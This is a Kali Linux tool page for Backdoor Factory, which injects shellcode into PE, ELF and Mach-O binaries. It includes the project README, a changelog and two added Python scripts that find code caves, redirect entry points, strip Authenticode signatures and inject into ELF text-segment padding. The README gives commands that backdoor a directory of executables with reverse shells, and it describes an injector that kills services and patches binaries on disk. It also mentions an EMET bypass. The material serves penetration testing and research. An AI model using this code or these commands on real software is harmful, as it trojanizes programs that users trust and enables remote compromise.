
Backdoor Factory in Kali Linux


Backdoor Factory (BDF)

Description of Backdoor Factory

Backdoor Factory (BDF) patches PE, ELF and Mach-O executables with shellcode.

The goal of BDF is to patch executable binaries with user-supplied shellcode while preserving the normal execution of the original, pre-patched program: the payload runs, then control returns to the original code.

Supported: Windows PE x32/x64 and Linux ELF x32/x64 (System V).

Some executables have built-in protections, so the tool will not work on every binary. Test the patched executables before distributing them to client machines or using them in an exercise.

PE files

  • Can find code caves in EXE/DLL files.
  • By default clears the pointer to the PE certificate table, which strips the Authenticode signature from the executable.
  • Can inject shellcode into existing code caves or into a new section.
  • Can detect whether a PE executable must run with elevated privileges.
  • When choosing code caves, the following commands are available:
    • -Jump (j): split the shellcode across several code caves chained with jumps
    • -Single (s): patch all of your shellcode into one code cave
    • -Append (a): create a code cave by appending a new section
    • -Ignore (i or q): skip this binary
  • Can ignore DLLs
  • Import table patching
  • AutoPatching (-m automatic)
  • Onionduke (-m onionduke)
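The cave search, single-cave patch and certificate-table clearing listed above, as an added example written for this page in Python; it is not BDF's own implementation (BDF builds on pefile and Capstone, this uses only struct). The in-memory sample PE, the 64-byte minimum cave size and the 16-byte placeholder payload are assumptions of the example. It also shows the file truncation the changelog further down calls proper unsigning, and the entry-point redirection a single-cave patch needs; it does not generate the payload's jump back to the original entry point, which real shellcode must carry itself.

```python
"""Added example, not BDF code: find code caves in a PE32/PE32+, write a payload
into one, retarget AddressOfEntryPoint at it, and clear the Authenticode pointer.
The sample PE, the 64-byte cave threshold and the payload are constructed."""
import struct

IMAGE_DIRECTORY_ENTRY_SECURITY = 4   # data-directory slot of the certificate table
IMAGE_SCN_MEM_EXECUTE = 0x20000000


def parse_pe(data):
    """Offsets of the data directories and AddressOfEntryPoint, plus the section table."""
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = e_lfanew + 4
    nsec = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x10B:        # PE32: data directories start 96 bytes into the optional header
        dd_off = opt + 96
    elif magic == 0x20B:      # PE32+: 112 bytes in, because ImageBase and size fields widen to 8
        dd_off = opt + 112
    else:
        raise ValueError("unknown optional header magic %#x" % magic)
    sections = []
    for i in range(nsec):
        off = opt + opt_size + 40 * i
        name, vsize, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, off)
        chars = struct.unpack_from("<I", data, off + 36)[0]
        sections.append({"name": name.rstrip(b"\0").decode(), "va": va, "vsize": vsize,
                         "raw_size": raw_size, "raw_ptr": raw_ptr, "chars": chars})
    return {"dd_off": dd_off, "entry_off": opt + 16, "sections": sections}


def entry_point(data):
    return struct.unpack_from("<I", data, parse_pe(data)["entry_off"])[0]


def security_directory(data):
    """(file offset, size) of the certificate table. This entry is a file offset, not an RVA."""
    return struct.unpack_from("<II", data, parse_pe(data)["dd_off"] + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY)


def find_code_caves(data, min_size=64):
    """Runs of at least min_size null bytes inside section data the loader actually maps.
    Returns (section name, file offset, RVA, size) tuples."""
    caves = []
    for s in parse_pe(data)["sections"]:
        # bytes past VirtualSize are file padding only, so they are not counted as cave space
        usable = min(s["raw_size"], s["vsize"]) if s["vsize"] else s["raw_size"]
        body = data[s["raw_ptr"]:s["raw_ptr"] + usable]
        i = 0
        while i < len(body):
            if body[i]:
                i += 1
                continue
            j = i
            while j < len(body) and body[j] == 0:
                j += 1
            if j - i >= min_size:
                caves.append((s["name"], s["raw_ptr"] + i, s["va"] + i, j - i))
            i = j
    return caves


def patch_cave(data, cave, shellcode):
    """Write shellcode into the cave and point the entry point at it.
    Returns (patched bytes, original entry RVA); the payload must jump back to that RVA."""
    name, file_off, rva, size = cave
    if len(shellcode) > size:
        raise ValueError("shellcode does not fit the cave")
    pe = parse_pe(data)
    sec = next(s for s in pe["sections"] if s["name"] == name)
    if not sec["chars"] & IMAGE_SCN_MEM_EXECUTE:
        raise ValueError("cave is in a non-executable section; fix Characteristics first")
    out = bytearray(data)
    out[file_off:file_off + len(shellcode)] = shellcode
    old_entry = struct.unpack_from("<I", out, pe["entry_off"])[0]
    struct.pack_into("<I", out, pe["entry_off"], rva)
    return bytes(out), old_entry


def unsign_pe(data):
    """Zero the SECURITY directory entry and cut the certificate blob off the file tail,
    so no stale signature bytes remain behind the cleared pointer."""
    entry = parse_pe(data)["dd_off"] + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY
    cert_off, cert_size = struct.unpack_from("<II", data, entry)
    out = bytearray(data)
    struct.pack_into("<II", out, entry, 0, 0)
    if cert_off and cert_off + cert_size == len(data):   # Authenticode blob normally ends the file
        del out[cert_off:]
    return bytes(out), (cert_off, cert_size)


def build_sample_pe():
    """Constructed PE32, not a real program: one .text section with 32 bytes of code then
    992 null bytes, and a dummy 256-byte certificate blob referenced by SECURITY."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                          # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x102)    # i386, 1 section, 32-bit exe
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                            # PE32 magic
    struct.pack_into("<I", opt, 16, 0x1000)                          # AddressOfEntryPoint
    struct.pack_into("<III", opt, 28, 0x400000, 0x1000, 0x200)       # ImageBase, SectionAlign, FileAlign
    struct.pack_into("<II", opt, 56, 0x2000, 0x200)                  # SizeOfImage, SizeOfHeaders
    struct.pack_into("<I", opt, 92, 16)                              # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY, 0x600, 0x100)
    sec = struct.pack("<8sIIIIIIHHI", b".text", 0x400, 0x1000, 0x400, 0x200, 0, 0, 0, 0, 0x60000020)
    headers = (bytes(dos) + b"PE\0\0" + coff + bytes(opt) + sec).ljust(0x200, b"\0")
    text = (b"\x55\x89\xe5" + b"\x90" * 29).ljust(0x400, b"\0")     # push ebp; mov ebp,esp; nops
    cert = b"\x00\x01\x00\x00\x00\x02\x02\x00".ljust(0x100, b"C")   # fake WIN_CERTIFICATE blob
    return headers + text + cert


if __name__ == "__main__":
    unsigned, cert = unsign_pe(build_sample_pe())
    caves = find_code_caves(unsigned)
    patched, old_entry = patch_cave(unsigned, caves[0], b"\xcc" * 16)   # placeholder payload
    print("cert table %#x/%#x cleared; caves %r; entry %#x -> %#x"
          % (cert[0], cert[1], caves, old_entry, entry_point(patched)))
```

The order matters in practice: unsign first, then search for caves, because the certificate overlay sits after the last section and a cave found there would vanish with the truncation. The check against IMAGE_SCN_MEM_EXECUTE is the reason BDF's jump and single modes prefer caves in .text; a cave in .data or .rsrc needs its section Characteristics changed, which is a visible tell.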

ELF files

  • Adds 1000 bytes to the TEXT segment and injects the shellcode into that region of code.

Mach-O files

  • Pre-Text section patching and signature removal
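The ELF text-segment approach above, as an added example written for this page (not BDF's code): it parses the ELF64 program header table, measures how much padding follows the executable PT_LOAD both in the file and inside its mapped page, then writes a payload into that padding, grows p_filesz/p_memsz and points e_entry at it. The sample ET_EXEC binary and the 1000-byte placeholder payload are constructed assumptions; a real payload must end by jumping to the saved original entry. The padding-only route is one way of adding bytes to the text segment; when the padding is too small the segment has to be grown and every later segment shifted, which the example refuses rather than attempts.

```python
"""Added example, not BDF code: inject into the padding after an ELF64 text segment.
Assumes an ET_EXEC binary whose text PT_LOAD has p_filesz == p_memsz."""
import struct

PT_LOAD, PF_X = 1, 0x1
EHDR_FMT, PHDR_FMT = "<16sHHIQQQIHHHHHH", "<IIQQQQQQ"   # Elf64_Ehdr, Elf64_Phdr


def parse_elf64(data):
    if data[:4] != b"\x7fELF" or data[4] != 2:
        raise ValueError("not an ELF64 file")
    f = struct.unpack_from(EHDR_FMT, data, 0)
    hdr = {"e_entry": f[4], "e_phoff": f[5], "e_phentsize": f[9], "e_phnum": f[10]}
    phdrs = []
    for i in range(hdr["e_phnum"]):
        off = hdr["e_phoff"] + i * hdr["e_phentsize"]
        t, fl, p_off, vaddr, _paddr, filesz, memsz, align = struct.unpack_from(PHDR_FMT, data, off)
        phdrs.append({"hdr_off": off, "type": t, "flags": fl, "offset": p_off, "vaddr": vaddr,
                      "filesz": filesz, "memsz": memsz, "align": align})
    return hdr, phdrs


def text_segment_room(data):
    """Index of the executable PT_LOAD and the padding after it:
    (index, bytes before the next segment's file offset, bytes before the end of its page).
    Both limits apply: the payload must be in the file and inside the mapped page."""
    _, phdrs = parse_elf64(data)
    idx = next(i for i, p in enumerate(phdrs) if p["type"] == PT_LOAD and p["flags"] & PF_X)
    t = phdrs[idx]
    file_end = t["offset"] + t["filesz"]
    later = [p["offset"] for p in phdrs
             if p["type"] == PT_LOAD and p is not t and p["offset"] >= file_end]
    file_gap = (min(later) if later else len(data)) - file_end
    mem_end = t["vaddr"] + t["memsz"]
    page_gap = (-mem_end % t["align"]) if t["align"] > 1 else 0
    return idx, file_gap, page_gap


def inject_text_padding(data, payload):
    """Place payload right after the text segment's file bytes and make it the entry point.
    Returns (patched bytes, original e_entry) without changing the file size."""
    idx, file_gap, page_gap = text_segment_room(data)
    if len(payload) > min(file_gap, page_gap):
        raise ValueError("payload exceeds padding; the segment would have to be grown and "
                         "later segments shifted, which this example does not do")
    hdr, phdrs = parse_elf64(data)
    t = phdrs[idx]
    out = bytearray(data)
    at = t["offset"] + t["filesz"]
    out[at:at + len(payload)] = payload                       # same length: nothing moves
    struct.pack_into("<QQ", out, t["hdr_off"] + 32,            # p_filesz, p_memsz
                     t["filesz"] + len(payload), t["memsz"] + len(payload))
    struct.pack_into("<Q", out, 24, t["vaddr"] + t["filesz"])  # e_entry -> payload
    return bytes(out), hdr["e_entry"]


def build_sample_elf():
    """Constructed ET_EXEC x86-64 ELF: text PT_LOAD at file 0..0x200 mapped at 0x400000,
    data PT_LOAD at file 0x1000 mapped at 0x601000, so 0xE00 bytes of padding sit between."""
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\0" * 8     # 64-bit, little-endian, v1, SysV
    ehdr = struct.pack(EHDR_FMT, ident, 2, 0x3E, 1, 0x400100, 64, 0, 0, 64, 56, 2, 0, 0, 0)
    text = struct.pack(PHDR_FMT, PT_LOAD, 5, 0, 0x400000, 0x400000, 0x200, 0x200, 0x1000)
    data = struct.pack(PHDR_FMT, PT_LOAD, 6, 0x1000, 0x601000, 0x601000, 0x100, 0x100, 0x1000)
    body = bytearray(0x1100)
    body[:176] = ehdr + text + data
    body[0x100:0x104] = b"\x48\x31\xc0\xc3"                   # entry: xor rax, rax ; ret
    body[0x1000:0x1100] = b"D" * 0x100
    return bytes(body)


if __name__ == "__main__":
    elf = build_sample_elf()
    print("text segment padding (idx, file, page):", text_segment_room(elf))
    patched, old_entry = inject_text_padding(elf, b"\x90" * 999 + b"\xc3")   # placeholder payload
    print("entry %#x -> %#x" % (old_entry, parse_elf64(patched)[0]["e_entry"]))
```

Why the page gap matters: the loader maps whole pages, so bytes past p_filesz but before the next page boundary land in memory as executable anyway; bytes past that boundary would be mapped by the next segment, if at all. For a PIE (ET_DYN) binary the same arithmetic holds but vaddr and e_entry are load-relative, and any payload must be position-independent.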



  • Author: Joshua Pitts
  • License: GPLv3 (as listed for the Kali package; the project README below states a change to the BSD 3 Clause license)

Tools included in the backdoor-factory package

backdoor-factory – Patch win32/64 binaries with shellcode

# backdoor-factory
[ASCII-art "Backdoor Factory" banner]




New version of BACKDOOR FACTORY being developed, to be released July 2021, only to sponsors! Sponsor here: https://github.com/sponsors/secretsquirrel

The Backdoor Factory (BDF)

For security professionals and researchers only.

The goal of BDF is to patch executable binaries with user desired shellcode and continue normal execution of the prepatched state.

Black Hat USA 2015:


Under a BSD 3 Clause License

Dependencies

To use OnionDuke you MUST be on an Intel machine because aPLib has no support for the ARM chipset yet.

Capstone engine can be installed from PyPI with:

Pefile, most recent:

osslsigncode (included in repo):

This installs Capstone 3.01 and uses pip to install pefile.

Some executables have built in protections, as such this will not work on all binaries. It is advisable that you test target binaries before deploying them to clients or using them in exercises. I’m on the verge of bypassing NSIS, so bypassing these checks will be included in the future.

Recently tested on many binaries.

./backdoor.py -h
Usage: backdoor.py [options]

Mach-O Files: Pre-Text Section patching and signature removal

Patch an exe/dll using an existing code cave:

Patch an exe/dll by adding a code section:

Patch a directory of exes:
./backdoor.py -d test/ -i -p 8080 -s reverse_shell_tcp -a
Output too long for README.

User supplied shellcode:
msfpayload windows/exec CMD='calc.exe' R > calc.bin
./backdoor.py -f psexec.exe -s user_supplied_shellcode -U calc.bin
This will pop calc.exe on a target windows workstation. So 1337. Much pwn. Wow.

BDF can sign PE files if you have a code-signing cert. It uses osslsigncode. Put your signing cert and private key in the certs/ directory. Prep your certs using the openssl commands from this blog post: http://secureallthethings.blogspot.com/2015/12/add-pe-code-signing-to-backdoor-factory.html

Put your private key password in a file (gasp) as so (exactly as so):

Name your certs EXACTLY as follows:

Your certs/ directory should look exactly as so:

Enable PE Code Signing with the -C flag as so:

On successful run you should see this line in BDF output:

Hunt and backdoor: Injector (Windows only)

The injector module will look for target executables to backdoor on disk. It will check to see if you have identified the target as a service, check to see if the process is running, kill the process and/or service, inject the executable with the shellcode, save the original file to either file.exe.old or another suffix of choice, and attempt to restart the process or service.
Edit the python dictionary "list_of_targets" in the 'injector' module for targets of your choosing.

  • Fix entry point truncation bug that led to improper recovery in rare instances
  • Support for dynamic paths in BDFProxy for preprocessor
  • Added the preprocessor and other optimizations
  • The preprocessor allows the user to modify the binary prior to payload injection
  • Invoke with the -p flag
  • See samples in ./preprocessor/
  • Added directory paths to BDF to find certs directory.
  • Bug fix in rsrc section for onionduke patching and remove of random win32 version value in PE Header
  • Added proper truncating of a PE file after signature pointer is cleared in PE header — e.g. proper unsigning. Resulting in better support for IAT patching
  • Fixed bug in IAT directory cave assignment that caused BDF crash
  • Made the feature optional with -A flag
  • Changed the Import Table Directory modifications from adding a new section to using an existing code cave

Added ‘replace’ PATCH_METHOD — a straight PE copy pasta of the supplied binary

More for usage with BDFProxy

Usage: ./backdoor.py -f weee.exe -m replace -b supplied_binary.exe

  • Stability fix for auto cave selection for rare caves of overlap
  • BH USA UPDATES, w00t!
  • OnionDuke, use -m onionduke
    • Supports user supplied exe's and dll's
    • Usage: ./backdoor.py -f originalfile.exe -m onionduke -b pentest.dll/exe
  • XP MODE = Prior IAT based payloads did not support XP, Wine, or Windows 98. If you need to support XP use the -X flag. I’m not supporting anything less than XP (and not XP x64).
  • Invoke UAC prompt to runas as admin. experimental — patches the PE manifest if requestedExecutionLevel exists.
  • Stability updates:
    • Fixed a bug with incorrect RVA calculation when jmp'ing across 2+ code caves
    • Better checks to determine if a new section for the IAT will write into appended data and therefore fail
  • Speed Improvements:
    • Faster code cave finding while using automatic mode (-m automatic)
    • Faster rsrc parsing to find the manifest file
  • Bug fix to the reverse_tcp_stager_threaded payload when using single caves payload
  • Adding check for Bound Imports (PE files with bound imports will not be patched)

Automatic patching for PE files (use -m automatic with a *_threaded payload)

New IAT payloads for x86/x64 PE files

2/14/2015

I delay the payload for 30 seconds, main code runs right away.

Setting of firm capstone commit for building into BDF, capstone ‘Next’ repo breaks BDF.

Fixes to support cython capstone implementation null byte truncation issue

This script writes the patched files to the backdoored/ directory so the user can test the payloads as they wish. Each payload type increments the port used by one.

OS X Beaconing Payloads for x86 and x64: beaconing_reverse_shell_tcp

-B 15 sets the beacon interval to 15 seconds.

Bug fix to support OS X for BDFProxy

PE UPX Patching Added

Mach-O x86/x64 added

x86 IAT payload optimization

Added support for ARM x32 LE ELF patching

Added FreeBSD x32 ELF patching support

Change to BSD 3 Clause License

During the process of adding Capstone, I removed about 500 lines of code. That’s pretty awesome.

Renamed loadliba_reverse_tcp to iat_reverse_tcp.

Small optimizations for speed.

Added a new win86 shellcode: loadliba_reverse_tcp

  • Based on the following research by Jared DeMott: http://bromiumlabs.files.wordpress.com/2014/02/bypassing-emet-4-1.pdf — Thanks @bannedit0 for mentioning this.
  • This shellcode uses the LoadLibraryA and GetProcAddress APIs to find all necessary APIs for a reverse TCP connection. No more of Stephen Fewer's API hash lookup (which is still brilliant).
  • It’s not stealthy. It’s position dependent. But the results are great (code cave jumping): https://www.virustotal.com/en/file/a31ed901abcacd61a09a84157887fc4a189d3fe3e3573c24e776bac8d5bb8a0f/analysis/1401385796/
  • Bypasses EMET 4.1. The caller protection doesn’t catch it.
  • As such, I’ll be furthering this idea with an algo that patches the binary with custom shellcode based on the APIs that are in the IAT. Including porting the current win86 shellcodes to this idea.



